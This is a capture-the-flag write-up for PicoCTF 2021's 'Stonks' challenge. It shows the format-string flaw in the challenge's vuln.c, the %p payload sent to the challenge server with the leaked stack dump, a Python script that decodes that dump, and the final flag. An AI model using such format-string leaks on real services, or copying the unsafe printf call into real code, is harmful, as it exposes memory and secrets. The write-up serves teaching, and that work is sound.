PicoCTF 2021 Writeups

our team's writeups for the 2021 PicoCTF competition

Stonks

DISCLAIMER: I got big hints from a friend. There is no way I'd have been able to solve this 😅. I'm also not entirely sure how exactly this challenge worked... I'm not qualified to write a writeup for this challenge 😅.

Overview:

Category: Binary Exploitation
Points: 20

Description

I decided to try something no one else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's insecure! vuln.c nc mercury.picoctf.net 53437

Hints

  1. Okay, maybe I'd believe you if you find my API key.

Stuff I Was Told (Since Pico is Over)

Approach

Connect to the shell with nc mercury.picoctf.net 53437

Take a look at

char *user_buf = malloc(300 + 1);   /* 301-byte heap buffer for the token */
printf("What is your API token?\n");
scanf("%300s", user_buf);           /* up to 300 bytes of user-controlled text, NUL-terminated */
printf("Buying stonks with token:\n");
printf(user_buf);                   /* the user's text is used as the format string itself, so any
                                       %-specifiers in it are interpreted; the format should be a
                                       fixed string with user_buf passed as an argument */

and notice the printf(user_buf); (I was kind of directed to this, so I'm not entirely sure why it's this specifically that's important).

What would you like to do?
1) Buy some stonks!
2) View my portfolio
1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
Buying stonks with token:
0x8b953900x804b0000x80489c30xf7fa5d800xffffffff0x10x8b931600xf7fb31100xf7fa5dc7(nil)0x8b941800x20x8b953700x8b953900x6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x346364620x616535320xffbd007d
Portfolio as of Thu Apr  8 01:52:11 UTC 2021


2 shares of H
5 shares of AF
34 shares of O
25 shares of SOF
229 shares of YQWO
Goodbye!

This part:

0x8b953900x804b0000x80489c30xf7fa5d800xffffffff0x10x8b931600xf7fb31100xf7fa5dc7(nil)0x8b941800x20x8b953700x8b953900x6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x346364620x616535320xffbd007d

looks like hex. I reformatted it in Notepad (and also took out everything before (nil), which I guess was padding or something):

8b9418028b953708b953906f6369707b465443306c5f49345f74356d5f6c6c306d5f795f79336e3463646261653532ffbd007d

and jammed it into HxD which gives:

‹”‹•7¹Socip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52ÿ½�}

It looks like ocip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52ÿ½�} is the flag, except each 4-character block is reversed (little endian? This is just a guess, I don't actually know).

I wrote a script to output the proper flag.

This output picoCTF{I_l05t_4ll_my_m0n3y_bdc425ea}�½ÿ
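The decoding step above, written out as an added example. This is not the author's script (the writeup does not include it) and it is not part of the challenge; it only reverses, in code, the hand conversion the writeup did in Notepad and HxD. The input is the exact %p reply shown in the session above, embedded as a constant. The reason the flag appears at all is the printf(user_buf) line: because the user's text is the format string, every %p makes printf fetch the next argument-sized word from the stack and print it, and the flag's bytes happened to sit in those words. The binary is 32-bit (addresses like 0x804b000 are 8 hex digits), so each leaked value is a 4-byte little-endian word, which is why the ASCII came out in reversed blocks of four when the hex was viewed as-is.

```python
import re
import struct

# Constructed input: the program's reply to an API token made of 24 "%p"
# specifiers, copied from the session shown earlier in this writeup.
LEAK = (
    "0x8b953900x804b0000x80489c30xf7fa5d800xffffffff0x10x8b931600xf7fb3110"
    "0xf7fa5dc7(nil)0x8b941800x20x8b953700x8b953900x6f6369700x7b465443"
    "0x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x346364620x61653532"
    "0xffbd007d"
)


def split_words(leak):
    """Turn the run-together %p output into a list of integers.

    Splitting on the literal "0x" is unambiguous: 'x' can never occur inside
    a hex value, so every "0x" marks the start of a new word even when the
    previous word ends in 0.  glibc prints a NULL pointer as "(nil)" for %p;
    map it to 0 first so it still occupies a slot.
    """
    parts = leak.replace("(nil)", "0x0").split("0x")
    return [int(p, 16) for p in parts if p]


def words_to_bytes(words):
    """Pack each leaked value as a 4-byte little-endian word (32-bit target).

    The lowest byte of each value is the first byte in memory, so the bytes
    of the flag come back in their original order here.
    """
    return b"".join(struct.pack("<I", w) for w in words)


def extract_flag(leak):
    """Return the picoCTF{...} string found in the leaked stack bytes, or None."""
    data = words_to_bytes(split_words(leak))
    m = re.search(rb"picoCTF\{[^}]*\}", data)
    return m.group(0).decode() if m else None


if __name__ == "__main__":
    words = split_words(LEAK)
    print(f"{len(words)} words leaked (one per %p in the token)")
    # The bytes after the closing brace (\x00\xbd\xff) are the stray
    # characters that showed up after the flag in the writeup's own output.
    print(words_to_bytes(words)[-44:])
    print(extract_flag(LEAK))
```

Running it prints the 24 leaked words and the flag; the trailing NUL and two junk bytes after the closing brace are the same stray characters the author's script printed, since they are simply the rest of the last 4-byte word.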

Flag

picoCTF{I_l05t_4ll_my_m0n3y_bdc425ea}